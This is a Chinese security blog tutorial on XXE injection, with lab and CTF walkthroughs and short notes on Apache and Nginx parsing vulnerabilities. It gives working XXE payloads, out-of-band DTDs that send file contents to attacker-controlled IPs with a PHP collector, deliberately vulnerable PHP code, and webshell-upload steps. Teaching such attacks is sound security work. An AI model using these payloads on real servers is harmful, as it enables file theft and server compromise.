XXE外部实体注入大总结【万字详解】

于 2024-08-11 00:00:00 发布
阅读量572 收藏 7
点赞数 18
分类专栏: 网络空间安全 文章标签: 安全 网络安全 php web安全 安全架构 安全威胁分析 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80064376/article/details/141087803
版权

文章目录

  1. 基本原理

    1. XML 文档可以包含实体 (Entity),实体可以是内部的(定义在文档内部)或外部的(引用外部资源)。外部实体通常用于在 XML 文档中包含外部数据。如果 XML 解析器允许解析外部实体,那么攻击者可以利用这一点来执行恶意操作。

  2. XXE发现

    1. 黑盒
      1. 获取得到Content-Type或数据类型为xml时,尝试进行xml语言payload进行测试
      2. 不管获取的Content—Type类型或数据传输类型,均可尝试修改后提交测试xxe
      3. XXE不仅在数据传输上可能存在漏洞,同样在文件上传引用插件解析或预览也会造成文件中的XXE Payload被执行
    2. 白盒
      1. 可通过应用功能追踪代码定位审计
      2. 可通过脚本特定函数搜索定位审计
      3. 可通过伪协议玩法绕过相关修复等

  3. XXE~payload

    1. 读取文件
      1.   <?xml version="1.0"?>
  <!DOCTYPE Mikasa [
    <!ENTITY test SYSTEM "file:///d:/e.txt">
  ]>
  <user>
    <username>&test;</username>
    <password>Mikasa</password>
  </user>
    2. 带外测试
      1.   <?xml version="1.0"?>
  <!DOCTYPE test [
    <!ENTITY % file SYSTEM "http://7drrcs.dnslog.cn">
    %file;
  ]>
  <user>
    <username>&send;</username>
    <password>Mikasa</password>
  </user>
    3. 引用外部实体dtd
      1.   <?xml version="1.0" ?>
  <!DOCTYPE test [
  <!ENTITY % file SYSTEM "http://127.0.0.1/evil2.dtd">
  %file;
  ]>
  <user><username>&send;</username><password>Mikasa</password></user>
  -----------------------------------------------------------------------------
  evil2.dtd
  <!ENTITY send SYSTEM "file:///d:/1/1.txt">
    4. 无回显读文件-带外
      1.   <?xml version="1.0"?>
  <!DOCTYPE ANY [
  <!ENTITY % file SYSTEM "file:///d:/e.txt">
  <!ENTITY % remote SYSTEM "http://47.94.236.117/test.dtd">
  %remote;
  %all;
  ]>
  <root>&send;</root>
  -------------------------------------------------------------------------------
  服务端
  test.dtd
  <!ENTITY % all "<!ENTITY send SYSTEM 'http://47.94.236.117/get.php?file=%file;'>">

  get.php
  <?php
  $data = $_GET['file'];
  $myfile = fopen("file.txt", "w+");
  fwrite($myfile, $data);
  fclose($myfile);
  ?>

  4. 复现

    1. **复现文件:**​php_xxe.zip

    2. 读取文件
      1. 源码
        1.   doLogin.php
  <?php
  $USERNAME = 'admin'; //账号
  $PASSWORD = 'admin'; //密码
  $result = null;

  libxml_disable_entity_loader(false);
  $xmlfile = file_get_contents('php://input');

  try{
  	$dom = new DOMDocument();
  	$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
  	$creds = simplexml_import_dom($dom);

  	$username = $creds->username;
  	$password = $creds->password;

  	if($username == $USERNAME && $password == $PASSWORD){
  		$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",1,$username);
  	}else{
  		$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",0,$username);
  	}
  }catch(Exception $e){
  	$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",3,$e->getMessage());
  }

  header('Content-Type: text/html; charset=utf-8');
  echo $result;
  ?>

      2. 捉取登录框的数据包,替换数据包内容即可

      3. 源码2
        1.   <?php
      libxml_disable_entity_loader (false);
      $xmlfile = file_get_contents('php://input');
      $dom = new DOMDocument();
      if($xmlfile){
          $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); 
          $result = simplexml_import_dom($dom);
          echo $result;
      }
      else{
          show_source(__FILE__);
      }
  ?>

      4. 构造payload:

        <?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE cong [  
<!ENTITY SangFor SYSTEM "php://filter/read=convert.base64-encode/resource=flag.php"> ]> 
<cong>&SangFor;</cong>//显示结果

      6. 复现3

        1. 页面

        2. 捉包,放在repeater中测试回显点在邮箱处

        3. 故在邮箱处构造payload

          <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test[
	<!ENTITY Sangfor SYSTEM "php://filter/read=convert.base64-encode/resource=flag.php">
]>
<root><name>111</name><tel>222</tel><email>&Sangfor;</email><password>333</password></root>
    3. 带外测试
      1. 源码
        <?php
$USERNAME = 'admin'; //账号
$PASSWORD = 'admin'; //密码
$result = null;

libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');

try{
	$dom = new DOMDocument();
	$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
	$creds = simplexml_import_dom($dom);

	$username = $creds->username;
	$password = $creds->password;

	if($username == $USERNAME && $password == $PASSWORD){
		//$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",1,$username);
	}else{
		//$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",0,$username);
	}
}catch(Exception $e){
	$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",3,$e->getMessage());
}

header('Content-Type: text/html; charset=utf-8');
echo $result;
?>

      2. 捉取数据包,替换其内容即可

    4. 外部实体引用

      1. 源码同上

      2. 本地有一个dtd文件,evil2.dtd,内容为 <!ENTITY send SYSTEM "file:///d:/1/1.txt">

      3. 捉包,改包来引用他

    5. 无回显带外
      1. 源码
        <?php
$USERNAME = 'admin'; //账号
$PASSWORD = 'admin'; //密码
$result = null;

libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');

try{
	$dom = new DOMDocument();
	$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);//加载xml文件
	$creds = simplexml_import_dom($dom);

	$username = $creds->username;
	$password = $creds->password;

	if($username == $USERNAME && $password == $PASSWORD){
		//$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",1,$username);
	}else{
		//$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",0,$username);
	}
}catch(Exception $e){
	$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",3,$e->getMessage());
}

header('Content-Type: text/html; charset=utf-8');
echo $result;
?>

      2. 在服务端部署evil2.dtd,和get.php

        1.   <?xml version="1.0"?>
  <!DOCTYPE ANY[
  <!ENTITY % file SYSTEM "file:///d:/1/1.txt">
  <!ENTITY % remote SYSTEM "http://43.139.186.80/evil2.dtd">
  %remote;
  %all;
  ]>
  <root>&send;</root>
  ---------------------------------------------
  服务端
  evil2.dtd
  <!ENTITY % all "<!ENTITY send SYSTEM 'http://43.139.186.80/get.php?file=%file;'>">

  get.php
  <?php
  $data = $_GET['file'];
  $myfile = fopen("file.txt", "w+");
  fwrite($myfile, $data);
  fclose($myfile);
  ?>

      3. 捉包替换数据包内容将1.txt的内容带到服务端

      4. 源码2
        1.   <?php
  $xml = file_get_contents("php://input");//$xml 由用户post数据赋值。
  if (strlen($xml)<10){
      highlight_file("index.php.bak");
  }
  libxml_disable_entity_loader(false);
  error_reporting(0);
  $data = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NOENT);//simplexml_load_string 函数会读取$xml文件。
  echo 'I just load, but did not dispay!';

      5. 利用HTTP请求,将文本的数据外带

      6. 访问flag.php状态码返回200,证明flag.php文件存在。

      7. 攻击者服务端创建两个文件

        1.   evil.txt
  <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=flag.php">
  <!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://43.139.186.80/test.php?p=%file;'>">

  test.php
  <?php
  if (isset($_GET['p'])){
      file_put_contents('result.txt', $_GET['p']);
  }

      8. 攻击payload

        <?xml version="1.0"?> 
<!DOCTYPE everything [  
<!ENTITY % SangFor SYSTEM "http://43.139.186.80/evil.txt"> 
%SangFor;%int;%send;]>

    6. CTF赛题

      1. 前端代码
        1.   靶场地址:http://web.jarvisoj.com:9882/
  <html>
  <head>
  <link href="//cdnjs.cloudflare.com/ajax/libs/x-editable/1.5.0/bootstrap3-editable/css/bootstrap-editable.css" rel="stylesheet"/>
  <script src="//cdnjs.cloudflare.com/ajax/libs/x-editable/1.5.0/bootstrap3-editable/js/bootstrap-editable.min.js"></script>
  </head>
  <body>
  <div class="show">
  <textarea id="tip-area" width=100px height=50px disabled></textarea>
  </div>
  <div class="control-area">
  <input id="evil-input" type="text" width=100px height=50px value="type sth!"/>
  <button class="btn btn-default" type="button" onclick="send()">Go!</button>
  </div>
  <script>
  function XHR() {
          var xhr;
          try {xhr = new XMLHttpRequest();}
          catch(e) {
              var IEXHRVers =["Msxml3.XMLHTTP","Msxml2.XMLHTTP","Microsoft.XMLHTTP"];
              for (var i=0,len=IEXHRVers.length;i< len;i++) {
                  try {xhr = new ActiveXObject(IEXHRVers[i]);}
                  catch(e) {continue;}
              }
          }
          return xhr;
      }

  function send(){
   evil_input = document.getElementById("evil-input").value;
   var xhr = XHR();
       xhr.open("post","/api/v1.0/try",true);
       xhr.onreadystatechange = function () {
           if (xhr.readyState==4 && xhr.status==201) {
               data = JSON.parse(xhr.responseText);
               tip_area = document.getElementById("tip-area");
               tip_area.value = data.task.search+data.task.value;
           }
       };
       xhr.setRequestHeader("Content-Type","application/json");
       xhr.send('{"search":"'+evil_input+'","value":"own"}');
  }
  </script>
  </body>
  </html>
  //可以看到XMLHttpRequest,猜测存在xxe漏洞·

      2. 捉取数据包并修改内容和类型

        POST /api/v1.0/try HTTP/1.1
Host: web.jarvisoj.com:9882
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/xml;charset=utf-8
Referer: http://web.jarvisoj.com:9882/
Content-Length: 108
DNT: 1
Connection: close

<?xml version = "1.0"?>
<!DOCTYPE ANY [
    <!ENTITY f SYSTEM "file:///home/ctf/flag.txt">
]>
<x>&f;</x>

代码审计流程

  1. 源码链接:https://pan.baidu.com/s/15O6Hf2tM90T3ZEp9E2x_Ew?pwd=cong

  2. 过程

    1. 首先放入审计系统

    2. 搜索可疑xxe函数simplexml_load_string

    3. 看到敏感可疑函数,最终pe_getxml函数的调用

    4. 最终到wechat_getxml,继续全局搜索最终

    5. 最后追踪到这个路径D:\phpstudy_pro\WWW\phpshe\include\plugin\payment\wechat\notify_url.php

    6. 在网站上访问并测试是否存在漏洞

    7. 发现xxe漏洞,因为通过源码发现他的返回结果是固定的,所以利用无回显文件外带即可任意读取

XXE内置类利用

  1. 源码

    1.   <?php
  class NotFound{
      function __construct()
      {
          die('404');
      }
  }
  spl_autoload_register(
      function ($class){
          new NotFound();
      }
  );
  $classname = isset($_GET['name']) ? $_GET['name']:null;
  $param = isset($_GET['param']) ? $_GET['param'] : null;
  $param2 = isset($_GET['param2']) ? $_GET['param2'] : null;
  if (class_exists($classname)){
      $newclass = new $classname($param,$param2);//创建name的类
      var_dump($newclass);//输出该类
      foreach ($newclass as $key=>$value)
          echo $key.'$value'.'<br>';
  }
  show_source(__FILE__);
  ?>

  2. 源码将传入的变量作为类名来创建类,这样我们就可以调用php内置存在的类来进行注入

  3. 首先可以使用GlobIterator类来寻找目录下各个文件的名字

  4. GlobIterator类第一个参数是必须的,也就是搜索的文件名,第二个参数为搜索。

  5. payload:?name=GlobIterator&param=*.php&&param2=2

  6. 通过搜索发现f1111ag.php文件,下一步使用SimpleXMLElement类读取f1111ag.php文件。

  7. payload:

    ?name=SimpleXMLElement&param=<?xml%20version="1.0"?><!DOCTYPE%20ANY%20[<!ENTITY%20xxe%20SYSTEM%20"php://filter/read=convert.base64-encode/resource=f1111ag.php">]><x>%26xxe;</x>&param2=2

Apache HTTPD 换行解析漏洞

(cve-2017-15715)

  1. 介绍

    1. Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。

  2. 条件

    1. apache 2.4.0~2.4.29版本
    2. 两个功能点:1.有文件上传 2.在同一个页面可以上传后修改名称,原因因该是3.php有双引号锁着,当将20改为0a时,双引号掉到下一行,即使改回去也不行,而内容处符合条件

  3. 复现

    1. 上传一个php木马,在更改后的名称加一个空格

    2. 转到16进制,将对应名称后面的20改为0a

    3. 连接时记得在后面添加上%0a即可

Nginx 文件名逻辑漏洞

(CVE-2013-4547)

  1. 原理

    1. 这个漏洞其实和代码执行没有太大关系,其主要原因是错误地解析了请求的URI,错误地获取到用户请求的文件名,导致出现权限绕过、代码执行的连带影响。

  2. 条件

    1. Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7

  3. 复现

    1. 上传gif数据包,在文件名处加空格与添加执行代码即可

    2. 访问/uploadfiles/10.gif .php这个路径,将空格处的16进制改为20 00

    3. 发包,执行成功

Nginx 解析漏洞

  1. 概念

    1. 由于 nginx.conf 配置将以 .php 结尾的文件交给 FastCGI 处理,攻击者可以通过构造类似 http://ip/uploadfiles/test.png/.php 的 URL(其中 test.png 是包含 PHP 代码的图片文件)来利用此漏洞。FastCGI 在找不到 .php 文件时,php.ini 中的 cgi.fix_pathinfo=1 配置会将请求路径修复为上层路径,即 test.png。如果 php-fpm.confsecurity.limit_extensions 配置为空,FastCGI 将解析 .png 文件为 PHP 代码。为防止此类攻击,应限制 php-fpm 仅解析 .php 扩展名。

  2. 条件

    1. 该漏洞与Nginx、php版本无关,属于用户配置不当造成的解析漏洞。
    2. php-fpm.conf配置文件未设置成.php

  3. 复现

    1. 上传正常图片,捉包,最后面放入执行代码

    3. 得到路径ploadfiles/4a47a0db6e60853dedfcfdf08a5ca249.png在后面加上/1.php进行访问即可

CongSec
关注
  • 18
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
python解析外部实体_详解XXE外部实体注入攻击
weixin_39520775的博客
12-04 491
XXE(XML External Entity Injection)定义XXE(XML External Entity Injection)即XML外部实体注入漏洞,XXE漏洞发送在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,XXE漏洞触发点常常是可上传xml文件的位置,没有对上传的xml文件进行严格的过滤,导致可上传恶意的xml文件。理解SQL注入是因为把恶意的SQ...
XXE外部实体注入漏洞总结
www_xuhss_com的博客
02-20 4224
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 XXE 漏洞原理 XXE是xml外部实体注入漏洞,应用程序解析xml输入时,没有禁止外部实体的加载,导致可加载恶意外部文件和代码,造成任意文件读取,命令执行,内网端口扫描攻击内网网站等危害。 漏洞危害 1. 读取敏感文件。 2. 执行ssrf漏洞,进行内网端口探测,攻击内网网站
Xxe外部实体注入(XML External Entity Injection)
xuyunpeng3189的博客
01-23 1099
无回显的xxe怎么利用 (1)使用dnslog平台进行数据外带 (2)构造远程dtd文件造成文件外泄 Xxe详细防御方法 禁用外部实体 这是防范最为严格的手段,从前面的学习我们已经知道XXE的全部利用手段基础都来源于外部实体注入, 也就是如果禁用了外部实体,那么XXE的所有攻击手段都将失效,无法再正常利用。 代码层禁用 PHP: libxml_disable_entity_loader(true); JAVA: DocumentBuilderFactory dbf =DocumentBuil
「 典型安全漏洞系列 」05.XML外部实体注入XXE详解
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
01-22 1683
标记:指计算机能理解的信息符号(标签),通过这些标签,计算机之间可以处理包含各种信息的HTML、文章等;可扩展性:使用者可以根据需要自行定义标签。下面是一个包含XML声明、文档类型定义(Document Type Definition,DTD)的XML文件样例。
XXE(XML外部实体注入详解
一期一会的博客
01-22 5215
XXE漏洞 XXE(XML External Entity Injection)又称为“XML外部实体注入漏洞”。 当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。例如,如果你当前使用的程序为PHP,则可以将libxml_disable_entity_loader设置为TRUE来禁用外部实体,从而起到防御的目的。 XML简介 XML 指可扩展标记语言(EXtensible Markup Language) XML 是一种标记语言,很类似 HTM
XXE外部实体引用注入的原理及利用
cike_y
02-17 625
XXE又称为XML,它是可扩展标记语言(Extensible Markup Language)的缩写,它是一种数据表示格式,常用于传输和存储数据。
XXE实体注入漏洞详解
m0_55854679的博客
03-08 622
文章目录什么是XXE什么是XMLXXE的危害XXE代码解析注意如何测试存在XXEXXE的防御练习 什么是XXE XML外部实体注入攻击。【目标执行了我们提交的XML代码】 =>XML(存数据不会做任何事情,被各种后端脚本调用)【像html|传输数据|无预定义】 =>外部实体 =>注入 【用户输入的数据被当做代码进行执行】 预定义:(预先定义好的东西) var_dump() 查看数据类型 eval() 可以命令执行 echo 他可以输出 典型攻击: <?xml
常见的Web漏洞——XXE外部实体注入
热门推荐
江左盟的博客
11-27 1万+
XML和DTD基础 XML是可扩展性标记语言,类似HTML的标记语言,但标签是自定义的。 DTD是文档类型定义,用来为XML文档定义语义约束,可以在xml文件中声明,也可以在外部引用。 XML文件结构: <? xml version="1.0" encoding="utf-8"?> DTD部分(可选) <root>Test</root> 支持的协议 上图是默认支持协议,还可以支持其他,如PHP支持的扩展协议有 DTD引用和实体声明 DTD内部声明:<!DOCT
XXE外部实体注入
人若有志,就不会在半坡停止。
11-07 598
DTD全称是The document typedefinition,即是文档类型定义,可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。DTD 可被成行地声明于XML 文档中,也可作为一个外部引用。XXE(xml external entity injection)即xml外部实体注入漏洞。XXE是针对应用程序解析XML输入类型的攻击。也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入
34-XXE(XML外部实体注入
XLbb的博客
05-19 927
XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。3、文档结构XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。4、基本的PAYLOAD结构:5、使用DTD实体的攻击方式 :DTD 引用方式(简要了解):1. DTD 内部声明DOCTYPE 根元素 [元素声明]>2. DTD 外部引用。
WEB安全XXE实体注入漏洞.pdf
12-12
然而,XML的这种灵活性也引入了安全风险,如XXE(XML External Entity Injection,XML外部实体注入漏洞)。 **0x01 XML基础知识** XML文档由XML声明、DTD(Document Type Definition)文档类型定义(可选)和文档...
XXE(XML 实体注入)漏洞攻防分析1
08-08
所以XXE和xss,sqli 等一样都是比较广泛的漏洞,所以从以往发现的漏洞可以看到很多厂商都存在这种漏洞,包括邮箱、门户、通用CMS等,如网易、腾讯邮箱XXE
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解
07-30
XXE(XML External Entity)漏洞,全称为XML外部实体注入,是针对使用XML解析器的应用程序的一种安全漏洞。XML是一种标记语言,常用于数据交换,而外部实体是XML文档的一部分,允许引用外部资源,如文件系统、网络...
WebSphere XML外部实体(XXE)注入漏洞(CVE-2020-4643)
10-25
WebSphere 9.0.0-9.0.5.5及8.5.0.0-8.5.5.18:更新安全补丁PH27509 WebSphere 8.0.0.0-8.0.0.15:升级到8.0.0.15版本,然后更新安全补丁PH27509 WebSphere 7.0.0.0-7.0.0.45:升级到7.0.0.45版本,然后更新安全补丁...
测试XXE注入.docx
09-06
XXE 注入(XML 外部实体注入)是一种类型的注入攻击,它会影响解析 XML 文件的应用程序。攻击者可以通过构造恶意的 XML 文件,使用外部实体来引用文件系统中的文件或网络资源,从而导致读取任意文件、执行系统命令、...
域名安全详解
TechEnthusiast的博客
08-06 154
域名安全网络安全的重要组成部分,涉及多个方面。
兼顾智能安全,医疗电子与AI如何打通?
bigbit_LiLi的博客
08-07 843
虽然目前光子计数技术仍在开发的过程中,但我们有理由相信,在不久后的将来,随着技术的进一步发展和应用拓展,光子计数有望在全球范围内得到更广泛的应用,为人类健康事业的发展做出更大的贡献。安森美耕耘医疗行业已经有三十多年的历史,例如在专业助听器的产品化落地中,安森美解决方案集成了多核处理器、先进的音频处理算法、低功耗蓝牙模块和丰富外围接口的系列核心产品,能够实现卓越的音质、长电池寿命和无线连接功能,帮助助听器制造商打造出高质量、智能化的助听器产品,显著提升用户的听觉体验。未来,医疗电子控制器肯定会国产化。
应急响应-主机安全之系统及进程排查相关命令(Linux操作系统-初级篇)
关注网络安全、云原生安全
08-07 1110
本文介绍下在应急响应过程中,linux系统下排查系统、进程、服务可能用到的命令,有些命令选项很多,读者可以仅看常用选项。不涉及内存、进程注入、rootkit等高级攻击的排查。常用-n参数,n为展示的数量systemctl命令 是系统服务管理器指令,它实际上将 service 和 chkconfig 这两个命令组合到一起。任务旧指令新指令使某服务自动启动使某服务不自动启动检查服务状态systemctl status httpd.service (服务详细信息)
某通电子文档安全管理系统 CDGAuthoriseTempletService1接口SQL注入漏洞复现 [附POC]
最新发布
薛定谔嘚喵博客
08-09 469
某通电子文档安全管理系统的 CDGAuthoriseTempletService1 接口存在 SQL 注入漏洞。 攻击者可以通过构造特定的POST 请求注入恶意 SQL代码,利用该漏洞对数据库执行任意 SQL 操作,获取所有用户的账户密码信息,破解md5值后可直接接管后台,导致系统处于极不安全的状态。
关于xxe外部实体安全
04-27
XXE攻击是指攻击者通过XML实体注入漏洞,向应用程序中注入恶意的XML实体数据,从而导致应用程序解析XML实体时,触发攻击者构造的恶意行为。其中,外部实体注入攻击是XXE攻击中最常见的一种方式。 为了防止XXE攻击中的外部实体注入攻击,可以采取以下措施: 1. 禁止使用外部实体:在解析XML数据时,应该禁止使用外部实体。可以在解析XML数据时,设置解析器的属性,禁止使用外部实体。 2. 过滤用户输入:在接收用户输入时,应该对输入数据进行过滤和验证,确保输入数据符合预期的格式和内容。可以使用正则表达式等方法,对用户输入进行限制和过滤。 3. 使用安全的XML解析器:使用安全的XML解析器可以有效地避免XXE攻击。一些安全的XML解析器,如SAX、DOM4J等,在解析XML数据时,会默认禁止使用外部实体。 4. 加强安全审计:及时发现和修复应用程序中的安全漏洞,可以有效地避免XXE攻击的发生。因此,应该加强安全审计工作,定期对应用程序进行安全检测和评估。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

CongSec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值